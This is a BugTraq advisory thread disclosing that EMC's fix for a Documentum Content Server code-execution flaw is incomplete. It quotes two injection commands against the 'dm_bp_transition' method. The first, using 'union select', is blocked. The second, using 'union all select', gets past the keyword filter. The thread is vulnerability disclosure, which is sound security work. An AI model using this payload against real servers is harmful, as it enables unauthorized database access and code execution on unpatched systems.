BugTraq
EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532) Aug 17 2015 06:25PM
andrew panfilov tel (1 replies)
Re: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532) Aug 19 2015 11:39AM
andrew panfilov tel
Sorry,

previous disclosure contests CVE-2015-4533, though CVE-2015-4532 will be
also contested soon.

__
Regards,
Andrey B. Panfilov

-----Original Message-----
From: andrew (at) panfilov (dot) tel [email concealed]
Sent: Tuesday, August 18, 2015 4:25 AM
To: Bugtraq
Subject: EMC Documentum Content Server: arbitrary code execution (incomplete
fix in CVE-2015-4532)

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see http://seclists.org/bugtraq/2015/Jul/51

New behavior introduced in CVE-2015-4532:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."

New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

__
Regards,
Andrey B. Panfilov

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus